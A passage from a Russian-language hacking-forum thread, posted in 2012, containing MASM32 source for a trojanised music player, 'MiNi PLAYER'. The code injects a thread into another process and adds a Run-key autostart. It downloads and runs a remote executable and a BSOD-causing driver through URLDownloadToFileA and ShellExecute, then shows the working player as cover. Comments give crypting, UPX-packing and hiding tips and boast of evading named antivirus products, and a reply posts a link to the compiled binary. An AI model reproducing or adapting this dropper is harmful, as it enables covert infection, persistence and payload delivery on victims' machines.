; внедрившись выполняемся отдельным потоком c передачей управления на пламенный msg-привет!
ThreadProc proc
pushad
mov ebp,[esp+4*8+4] ; смещение кода
push MB_ICONINFORMATION
lea eax,[ebp+offset capt]
push eax
lea eax,[ebp+offset text]
push eax
push 0
_call @MessageBox
popad
ret 04h
ThreadProc endp
@CreateThread dd 0
@GetWindowThreadProcessId dd 0
@FindWindow dd 0
@GetDlgCtrlID dd 0
@MessageBox dd 0
copysize equ $ - offset start
@tmp_buf label dword
@ImageBase dd 0
@ImportTableRVA dd 0
@@program:
.code
;--------- Закрепляйся,загружайся и впивайся(для самых маленьких)(Чтобы наверняка) ------------------;
; Чтобы выжить - лучше подгружать себя к какому-нибудь системному процессу(а не гадить в реестр),для ;
; игры в прятки на уровне ядра - использовать драйвер сокрытия процессов из диспечера задач.][-.106 ;
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
; Свои-свои.Но где свои - там могут появится и чужие...О,спасибо могучий Александр Э.Большой враг AV ;
; Враг моего врага - наш друг !
;----------------------------------------------------------------------------------------------------;
;-------------- AutoRun(самое простое)А стоит ли))но тест - есть тест !!! -----------------;
push 0
push offset pKey
push 0
push KEY_ALL_ACCESS
push REG_OPTION_NON_VOLATILE
push 0
push 0
push offset RunKey
push HKEY_CURRENT_USER
; push HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push offset PathToSavedr
call lstrlenA
push eax
push offset PathToSavedr
push REG_SZ
push 0
push offset Service
push pKey
call RegSetValueExA
push pKey
call RegCloseKey
push offset pi
push offset startupinfo
push 0
push 0
push 0
push NORMAL_PRIORITY_CLASS
push 0
push 0
push 0
push offset PathToSavedr
call CreateProcessA
; ------ URLDownTo ------;
; --- А это оставим -----;
xor eax, eax
mov ecx, offset DQWORD_VAL
db 00fh, 10h, 01h ; опять пишем на опкодах
db 00fh, 50h, 0c0h
test eax, eax
jz Exit
;--------- Driver -------;
push offset URLmonStr
call LoadLibraryA
push offset Downloadfunc
push eax
call GetProcAddress
push 0
push 0
push offset PathToSavedr
push offset TargetURLdr
push 0
call eax
push offset Shell32Str
call LoadLibraryA
push offset Executefunc
push eax
call GetProcAddress
push 0
push 0
push 0
push offset PathToSavedr
push offset OpenString
push 0
call eax
;---------- Exe --------;
push offset URLmonStr
call LoadLibraryA
push offset Downloadfunc
push eax
call GetProcAddress
push 0
push 0
push offset PathToSave
push offset TargetURL
push 0
call eax
push offset Shell32Str
call LoadLibraryA
push offset Executefunc
push eax
call GetProcAddress
push 0
push 0
push 0
push offset PathToSave
push offset OpenString
push 0
call eax
push 1000
call Sleep
mov eax,Music
jmp eax
;--- Exit Code ---;
Exit:
push 0
call ExitProcess
;--------------------------------------------- String -----------------------------------------------------------------------------;
Olly db "bof.dll",0
Service db "System",0
OpenString db "open",0
URLmonStr db "urlmon.dll",0
Shell32Str db "shell32.dll",0
Executefunc db "ShellExecuteA",0
Downloadfunc db "URLDownloadToFileA",0
TargetURL db "http://127.0.0.1/test.sys",0 ; Driver-URL(как вариант загрузить драйвер обращающийся к памяти по нулевому указателю);
TargetURLdr db "http://127.0.0.1/test.exe",0 ; URL сервера с test.exe(или зевс.exe)или BSODDriverLoader(a))это на ваше усмотрение);
RunKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0 ; или куда хотите,но было бы лучше подгружать свою DLL ;
PathToSave db "C:\Documents and Settings\Пользователь\Рабочий стол\test.sys",0 ; если будем следить -> советую %systemroot% ;
PathToSavedr db "C:\Documents and Settings\Пользователь\Рабочий стол\test.exe",0 ; в system32 легче затеряться ;
DQWORD_VAL db 0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh,0ffh ; и тебе,ГрекА,спасибо! ;
;+++++++++++++++++++++++++++++++ Small Player --> добавлен BIN Format + 1 Taste + Мышка - Загрызушка +++++++++++++++++++++++++++++++;
Music:
invoke GetModuleHandle, NULL
mov hInstance, eax
invoke CreateSolidBrush, Green
mov hBrush, eax
invoke CreateSolidBrush, Black
mov hBkColor, eax
invoke InitCommonControls
invoke DialogBoxParam, hInstance, DIALOG, NULL, addr DlgProc, NULL
invoke ExitProcess, NULL
DlgProc proc hWnd :HWND, uMsg :UINT, wParam :WPARAM, lParam :LPARAM
LOCAL ps :PAINTSTRUCT
LOCAL hdc :HDC
LOCAL rect :RECT
LOCAL pt :POINT
LOCAL lb :LOGBRUSH
.if uMsg == WM_INITDIALOG
invoke LoadIcon, hInstance, 1
mov hIcon, eax
invoke SendMessage, hWnd, WM_SETICON, 1, hIcon
invoke SetWindowText, hWnd, addr AppName
invoke _FSOUND_Init, 44100, 32, 0
invoke FindResource, hInstance, 18, RT_RCDATA
invoke LoadResource, hInstance, eax
invoke SetDlgItemText, hWnd, STATIC2, eax
invoke GetDlgItemText, hWnd, STATIC2, addr ScrollStr, 0FFh
mov len, eax
add len, 47
invoke SetDlgItemText, hWnd, STATIC2, NULL
invoke lstrcat, addr ScrollStr, addr Space
invoke SetWindowLong, hWnd, GWL_EXSTYLE, 80000
invoke Bitmap2But, hWnd, hInstance, IMAGE, 5
invoke Bitmap2But, hWnd, hInstance, LOAD, 7
invoke Bitmap2But, hWnd, hInstance, EXIT, 8
invoke Bitmap2But, hWnd, hInstance, START, 10
invoke Bitmap2But, hWnd, hInstance, PAUSE1, 11
invoke Bitmap2But, hWnd, hInstance, STOP, 15
invoke Bitmap2But, hWnd, hInstance, MINIMIZE, 21
invoke Bitmap2But, hWnd, hInstance, FrecAdd, 24
invoke Bitmap2But, hWnd, hInstance, FrecSub, 25
invoke Bitmap2But, hWnd, hInstance, Key, 27
invoke SetTimer, hWnd, 1, 200, 0
invoke SendDlgItemMessage, hWnd, SLIDER, TBM_SETRANGEMIN, FALSE, 0
invoke SendDlgItemMessage, hWnd, SLIDER, TBM_SETRANGEMAX, FALSE, 32
invoke SendDlgItemMessage, hWnd, SLIDER, TBM_SETPOS, TRUE, 25
.elseif uMsg == WM_COMMAND
mov eax, wParam
.if eax == LOAD
mov ofn.lStructSize, SIZEOF ofn
push hWnd
pop ofn.hWndOwner
push hInstance
pop ofn.hInstance
mov ofn.lpstrFilter, offset Filter
mov ofn.lpstrFile, offset Path
mov ofn.nMaxFile, MAXSIZE
mov ofn.Flags, OFN_FILEMUSTEXIST or OFN_PATHMUSTEXIST or OFN_LONGNAMES or\
OFN_EXPLORER or OFN_HIDEREADONLY
mov ofn.lpstrTitle, offset TitleCaption
invoke GetOpenFileName, addr ofn
cmp eax, 0
je no
.if ModSound == TRUE
invoke _FMUSIC_FreeSong, ModHandle
.elseif ModSound == FALSE
invoke _FSOUND_Sample_Free, ModHandle
.endif
invoke _FMUSIC_LoadSong, addr Path
cmp eax, 0
je unload
mov ModHandle, eax
invoke _FMUSIC_PlaySong, ModHandle
mov ModSound, TRUE
je load
unload:
invoke _FSOUND_Sample_Load, 0, addr Path, FSOUND_16BITS+FSOUND_STEREO, 0
mov ModHandle, eax
invoke _FSOUND_PlaySound, 0, ModHandle
mov ModSound, FALSE
invoke GetFileTitle, addr Path, addr TEMP, 50h
jmp sound
load:
mov fName, 0
invoke _FMUSIC_GetName, ModHandle
invoke SetDlgItemText, hWnd, STATIC2, eax
invoke GetDlgItemText, hWnd, STATIC2, addr TEMP, 0FFh
sound:
invoke _FSOUND_GetFrequency, 0
mov SoundF, eax
invoke SetDlgItemInt, hWnd, Freq, SoundF, 0
invoke lstrcat, addr fName, addr TEMP
invoke lstrcat, addr TrayName, addr TEMP
invoke lstrcat, addr fName, addr Space
invoke lstrlen, addr fName
sub eax, 5
mov _len, eax
invoke filesize, addr Path
invoke SetDlgItemInt, hWnd, STATIC2, eax, 0
invoke GetDlgItemText, hWnd, STATIC2, addr TEMP, 0FFh
invoke lstrcat, addr fSize, addr fTSize
invoke lstrcat, addr fSize, addr TEMP
invoke lstrcat, addr fSize, addr kb
invoke SetDlgItemText, hWnd, STATIC2, addr fSize
mov fSize, 0
no:
.endif
.if eax == PAUSE1
.if ModSound == TRUE
invoke _FMUSIC_SetPaused, ModHandle, TRUE
.elseif ModSound == FALSE
invoke _FSOUND_SetPaused, FSOUND_ALL, TRUE
.endif
.endif
.if eax == START
cmp Boolean, TRUE
jnz best
.if ModSound == TRUE
invoke _FMUSIC_PlaySong, ModHandle
.elseif ModSound == FALSE
invoke _FSOUND_PlaySound, 0, ModHandle
.endif
best:
.if ModSound == TRUE
invoke _FMUSIC_SetPaused, ModHandle, FALSE
.elseif ModSound == FALSE
invoke _FSOUND_SetPaused, FSOUND_ALL, FALSE
.endif
mov Boolean, FALSE
.endif
.if eax == STOP
.if ModSound == TRUE
invoke _FMUSIC_StopSong, ModHandle
.elseif ModSound == FALSE
invoke _FSOUND_StopSound, FSOUND_ALL
.endif
mov Boolean, TRUE
.endif
.if eax == EXIT
.if ModSound == TRUE
invoke _FMUSIC_FreeSong, ModHandle
.elseif ModSound == FALSE
invoke _FSOUND_Close
.endif
invoke EndDialog, hWnd, NULL
.endif
.if eax == MINIMIZE
mov note.cbSize, sizeof NOTIFYICONDATA
push hWnd
pop note.hwnd
mov note.uID, 0
mov note.uFlags, NIF_ICON+NIF_MESSAGE+NIF_TIP
mov note.uCallbackMessage, WM_USER+5
mov eax, hIcon
mov note.hIcon, eax
invoke lstrcpy, addr note.szTip, addr TrayName
invoke ShowWindow,hWnd, SW_HIDE
invoke Shell_NotifyIcon, NIM_ADD, addr note
.endif
.if eax == FrecAdd
cmp SoundF, 704600
je loc_003
add SoundF, 1000
loc_003:
invoke SetDlgItemInt, hWnd, Freq, SoundF, 0
invoke _FSOUND_SetFrequency, FSOUND_ALL, SoundF
.endif
.if eax == FrecSub
cmp SoundF, 1100
je loc_004
sub SoundF, 1000
loc_004:
invoke SetDlgItemInt, hWnd, Freq, SoundF, 0
invoke _FSOUND_SetFrequency, FSOUND_ALL, SoundF
.endif
.elseif uMsg == WM_USER+5
.if wParam == 0
.if lParam == WM_LBUTTONDBLCLK
invoke SendMessage, hWnd, WM_COMMAND, 1000, 0
invoke ShowWindow,hWnd, SW_RESTORE
invoke Shell_NotifyIcon, NIM_DELETE, addr note
.endif
.endif
.elseif uMsg == WM_HSCROLL
mov eax, wParam
and eax, 0FFFFh
.if eax == TB_THUMBPOSITION
mov eax, wParam
shr eax, 16
imul eax, 8
.if ModSound == TRUE
invoke _FMUSIC_SetMasterVolume, ModHandle, eax
.elseif ModSound == FALSE
invoke _FSOUND_SetVolume, FSOUND_ALL, eax
.endif
.endif
.elseif uMsg == WM_LBUTTONDOWN
invoke SendMessage, hWnd, WM_NCLBUTTONDOWN, HTCAPTION, 0
.elseif uMsg == WM_CTLCOLORDLG
mov eax, hBkColor
ret
.elseif uMsg == WM_CTLCOLORSTATIC || uMsg == WM_CTLCOLORLISTBOX
invoke SetColor, wParam, TRANSPARENT, Red
mov eax, hBkColor
ret
.elseif uMsg == WM_TIMER
invoke TextScr, len, number
mov number, eax
invoke RedrawWindow, hWnd, 0, 0, TRUE
.elseif uMsg == WM_PAINT
invoke BeginPaint, hWnd, addr ps
mov hdc, eax
invoke SetColor, hdc, TRANSPARENT, Red
invoke GetClientRect, hWnd, addr rect
invoke FrameRect, hdc, addr rect, hBrush
mov rect.top, 6
mov rect.right, 150
mov rect.left, 5
invoke DrawText, hdc, addr ScrollStr, number, addr rect, DT_RIGHT
invoke lstrlen, addr fName
cmp eax, 0
je loc_001
invoke TextScr, eax, _numb
mov _numb, eax
mov rect.top, 25
mov rect.right, 190
invoke DrawText, hdc, addr fName, _numb, addr rect, DT_RIGHT
loc_001:
mov lb.lbStyle, BS_SOLID
mov lb.lbColor, Green
mov lb.lbHatch, 0
invoke ExtCreatePen, PS_SOLID, 1, addr lb, 0, 0
invoke SelectObject, hdc, eax
invoke MoveToEx, hdc, 0, 25, NULL
invoke LineTo, hdc, 200, 25
invoke MoveToEx, hdc, 0, 57, NULL
invoke LineTo, hdc, 200, 57
invoke EndPaint, hWnd, addr ps
.endif
xor eax, eax
Ret
DlgProc EndP
TextScr proc len_t :DWORD, numb :DWORD
inc numb
mov eax, numb
cmp eax, len_t
jnz loc_002
xor eax, eax
loc_002:
Ret
TextScr EndP
Bitmap2But proc handle :HWND, hInst :HINSTANCE, But :DWORD, Res :DWORD
invoke LoadBitmap, hInst, Res
invoke SendDlgItemMessage, handle, But, BM_SETIMAGE, IMAGE_BITMAP, eax
Ret
Bitmap2But EndP
SetColor proc DC :HDC, Bk :COLORREF, Text :COLORREF
invoke SetBkColor, DC, Bk
invoke SetTextColor, DC, Text
Ret
SetColor EndP
bоdу_end:
end start ; **************************** Happy END ******************************** ;
; ;
; Посуём мы всё в бадью,закриптуем и .., - Адью!
; Потому что в самом деле - не давать же им Ладью !
; ;
; +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ;
; >>>>>>>>—————-> >>>>>>>>—————> >>>>>>>>———–> ;
; После компиляции [MASM32] > build.bat -> открываем образец в отладчике> ;
; Нажимаем F9 на исполнение –> код закриптуется -/\/\/\/\/\/\/\/\/\/\–> ;
; Выделяем закриптованый участок кода –> (Отсюда и до сколько надо) –> ;
; Сохраняем модификацию –> Copy to Executable –> Selection -> Save file ;
; Для уменьшения веса сожмём UPX-ом(или чем угодно)хоть свой пакер пишите ;
; Протестируем основные и дополнительные возможности:,
; (только не забываем правильно указать путь к залитым файлам на сервере) ;
data.inc
include fmod.inc
includelib fmod.lib
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\masm32.inc
include \masm32\include\gdi32.inc
include \masm32\include\winmm.inc
include \masm32\include\urlmon.inc
include \masm32\include\comdlg32.inc
include \masm32\include\comctl32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\winmm.lib
includelib \masm32\lib\urlmon.lib
includelib \masm32\lib\comdlg32.lib
includelib \masm32\lib\comctl32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
DlgProc proto :HWND, :UINT, :WPARAM, :LPARAM
Bitmap2But proto :HWND, :HINSTANCE, :DWORD, :DWORD
SetColor PROTO :HDC, :COLORREF, :COLORREF
TextScr PROTO :DWORD, :DWORD
Rand15 proto :DWORD
STRSIZE equ 35
.const
DIALOG equ 1
STATIC1 equ 3
STATIC2 equ 4
IMAGE equ 5
LOAD equ 6
EXIT equ 9
START equ 10
PAUSE1 equ 11
VOLUME equ 12
STOP equ 16
MAXSIZE equ 260
SLIDER equ 19
MINIMIZE equ 20
FrecAdd equ 22
FrecSub equ 23
Freq equ 26
Key equ 27
.data
ErrorC db "ERROR!", 0
AppName db "MiNi PLAYER", 0
ScrollStr DWORD 100 dup (0)
fName DWORD 50 dup (0)
number dd 0
_numb dd 0
Filter db "All Files (*.*)", 0, "*.bin;*.xm;*.it;*.mod;*.mid;*.rmi;*.sgt;*.fsb;*.s3m;*.wav;*.mp2;*.mp3;*.ogg;*.raw", 0
db "Fast Tracker Sound (*.bin)", 0, "*.bin", 0
db "Fast Tracker Sound (*.xm)", 0, "*.xm", 0
db "Impulse Tracker (*.it)", 0, "*.it", 0
db "Pro Tracker Modules (*.mod)", 0, "*.mod", 0
db "MiDi Files (*.mid, *.rmi)", 0, "*.mid;*.rmi", 0
db "DirectMusic segment files (*.sgt)", 0, "*.sgt", 0
db "FMOD Sample Bank files (*.fsb)", 0, "*.fsb", 0
db "ScreamTracker Modules (*.s3m)", 0, "*.s3m", 0
db "Wave Audio files (*.wav)", 0, "*.wav", 0
db "Mpeg 2 Layer (*.mp2)", 0, "*.mp2", 0
db "Mpeg 3 Layer (*.mp3)", 0, "*.mp3", 0
db "OGG Vorbis Decoder (*.ogg)", 0, "*.ogg", 0
db "RAW files (*.raw)", 0, "*.raw", 0, 0
TitleCaption db "Select Sound File...",0
Path DWORD 50 dup (0)
Space db 47 dup (20h), 0
kb db " KB", 0
TEMP DWORD 50 dup (0)
fTSize db "File Size: ",0
fSize DWORD 10 dup (0)
TrayName DWORD 20 dup (0)
result REAL8 ?
counts dd 16 dup(0)
hDlg dd 0
msg MSG <>
rc RECT <>
sz db 30 dup(0)
ctr dd 0
r9Seed dd ?
array dd 100000 dup(?)
.data?
pKey dd ?
hInstance DWORD ?
hBrush DWORD ?
hBkColor DWORD ?
hIcon DWORD ?
VOL DWORD ?
Boolean DWORD ?
len DWORD ?
_len DWORD ?
ModHandle DWORD ?
ModSound DWORD ?
SoundF DWORD ?
startupinfo STARTUPINFO <>
ofn OPENFILENAME <>
note NOTIFYICONDATA <>
pi PROCESS_INFORMATION <>
rsrc.rc
#define DIALOG 1
#define STATIC2 4
#define IMAGE 5
#define LOAD 6
#define EXIT 9
#define START 10
#define PAUSE1 11
#define STOP 16
#define SLIDER 19
#define MINIMIZE 20
#define FrecAdd 22
#define FrecSub 23
#define Freq 26
#define Key 27
1 ICON DISCARDABLE "MAN.ico"
5 BITMAP DISCARDABLE "am.bmp"
7 BITMAP DISCARDABLE "load.bmp"
8 BITMAP DISCARDABLE "exit.bmp"
10 BITMAP DISCARDABLE "play.bmp"
11 BITMAP DISCARDABLE "pause.bmp"
15 BITMAP DISCARDABLE "stop.bmp"
1 24 DISCARDABLE "MANIFEST.xml"
18 RCDATA DISCARDABLE "scroll_text.txt"
21 BITMAP DISCARDABLE "minimize.bmp"
24 BITMAP DISCARDABLE "add.bmp"
25 BITMAP DISCARDABLE "sub.bmp"
27 BITMAP DISCARDABLE "set.bmp"
DIALOG DIALOGEX 0,0,131,164
FONT 8,"MS Sans Serif",0,0,204
STYLE 0x90000800
EXSTYLE 0x00000008
BEGIN
CONTROL "",STATIC2,"Static",0x50000001,3,25,124,9,0x00000000
CONTROL "",IMAGE,"Button",0x50018080,5,61,121,82, 0x00010000
CONTROL "",LOAD,"Button",0x50018080,4,38,11,11,0x00010000
CONTROL "",EXIT,"Button",0x50018080,117,3,11,11,0x00010000
CONTROL "",START,"Button",0x50018080,18,38,11,11,0x00010000
CONTROL "",PAUSE1,"Button",0x50018080,32,38,11,11,0x00010000
CONTROL "",STOP,"Button",0x50018080,46,38,11,11,0x00010000
CONTROL "",SLIDER,"msctls_trackbar32",0x50010018,1,51,129,10,0x00000000
CONTROL "",MINIMIZE,"Button",0x50018080,103,3,11,11,0x00010000
CONTROL "",FrecAdd,"Button",0x50018080,74,38,11,11,0x00010000
CONTROL "",FrecSub,"Button",0x50018080,60,38,11,11,0x00010000
CONTROL "",Freq,"Static",0x50000001,88,39,37,10,0x00000000
CONTROL "",Key,"Button",0x50018080,41,148,50,11,0x00010000
END
1 VERSIONINFO
FILEVERSION 3,1,0,0
PRODUCTVERSION 3,1,0,0
FILEOS 0x00000004
FILETYPE 0x00000001
BEGIN
BLOCK "StringFileInfo"
BEGIN
BLOCK "040904E4"
BEGIN
VALUE "CompanyName", "FreeCX+AmnesiaFaust\0"
VALUE "FileDesсriрtion", "Mini-player\0"
VALUE "OriginalFilename", "MUSiC\0"
END
END
BLOCK "VarFileInfo"
BEGIN
VALUE "Translation",0x0409, 0x04e4
END
END
; Не корысти ради,а исключительно только любопытства для,тестировалось на :
Avira AntiVir Personal SpyBotSD Dr.WebCureIT Kaspersky Avast AVZ
И некоторых других Анти-Вирусных хищниках
; (Все продукты имели актуальные движки и обновлённые базы сигнатур)
; Нам даже страшно говорить о результатах.ПОЗОР АНТИВИРУСНОЙ ИНДУСТРИИ!!!
; Удачи,Любви,Благополучия и Неимоверных Творческих Успехов !!!
; Пускай вам всем по - жизни светит только зелёный свет !!!
; P.S. А наши,- всё равно победят ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ;[sm=db.gif][sm=ba.gif]
|
|
|
|
|
RE: BSOD - 2012-02-12 21:05:34.010000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
Чето я не понял как вы там в проводнике поток создаете? Точнее как передается управление на внедренный код?
|
|
|
|
|
RE: BSOD - 2012-02-12 22:33:01.900000
|
|
|
Elisaveta
Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
|
Управдение передаётся на пламенный msg привет "PikA-Bello!"
Запустите под хрюшкой закриптованый SmallPlayer_Mod,повремените чуть-чуть,
если нажмёте правую кнопку мышки-загрызушкина на мой компьютер,увидите -> передаётся управление на msg код или нет.[sm=db.gif]
|
|
|
|
|
RE: BSOD - 2012-02-13 00:02:45.320000
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
не канпилится )) нету у нас таких инклудов
include fmod.inc
includelib fmod.lib довайте готовый exe
|
|
|
|
|
RE: BSOD - 2012-02-14 06:50:40.920000
|
|
|
Elisaveta
Сообщений: 58
Оценки: 0
Присоединился: 2009-11-16 01:45:21.883333
|
Ничего что на депозит?
MMX:
Ребята,посмотрите пожалуйста на наше творчество.
Возможно,вам будет что-нибудь интересно.Хотите побольше юмора и Хардкора?
===============================================================
А плеер с дополнениями весит чуть больше 60kb[sm=dv.gif]
http://depositMUSICfiles.com/files/9jy90oztf
dep__ositfiles.com/files/9jy90oztf
eLISA:
Заранее прошу прощения за ошибки и неточности.Ненужное закомментировать.
Ведь я ещё только учусь и развиваюсь…[sm=ba.gif]
Электронная подпись.
08b6509d828f7507168144e008887f27c7cce232 *Cool.elisaveta-amnesia.txt [sm=aj.gif]
|
|
|
|
|
RE: BSOD - 2012-02-14 11:16:21.793333
|
|
|
Flint_ta
Сообщений: 3720
Оценки: 1120
Присоединился: 2007-01-26 15:49:18.323333
|
quote:
Запустите под хрюшкой закриптованый SmallPlayer_Mod,повремените чуть-чуть,
если нажмёте правую кнопку мышки-загрызушкина на мой компьютер,увидите -> передаётся управление на msg код или нет.
По нажатию на кнопку пуск активируется. В общем теперь все ясно.
А вот это интересно )
push 256 ; Point_Y = 256
push 314 ; Point_X = 314
call WindowFromPoint
push AW_HIDE or AW_BLEND
push 1793 ; Duration
push eax
call AnimateWindow
|
|
|
|
|
RE: BSOD - 2012-02-17 06:13:10.590000
|
|
|
AmnesiaMMX
Сообщений: 4
Оценки: 0
Присоединился: 2012-01-12 23:45:57.786666
|
Я очень долго думал.Сомневался.
|
|
|
|
|
RE: BSOD - 2012-02-17 06:14:21.143333
|
|
|
AmnesiaMMX
Сообщений: 4
Оценки: 0
Присоединился: 2012-01-12 23:45:57.786666
|
Взвешивал все "ЗА" и "ПРОТИВ".
|
|
|
|
|
RE: BSOD - 2012-02-17 06:18:33.326666
|
|
|
AmnesiaMMX
Сообщений: 4
Оценки: 0
Присоединился: 2012-01-12 23:45:57.786666
|
А потом решил…
|
|
|
|
|
RE: BSOD - 2012-02-17 06:19:52.556666
|
|
|
AmnesiaMMX
Сообщений: 4
Оценки: 0
Присоединился: 2012-01-12 23:45:57.786666
|
Что жена - лучше чем собака!:D
|
|
|
|
|
|
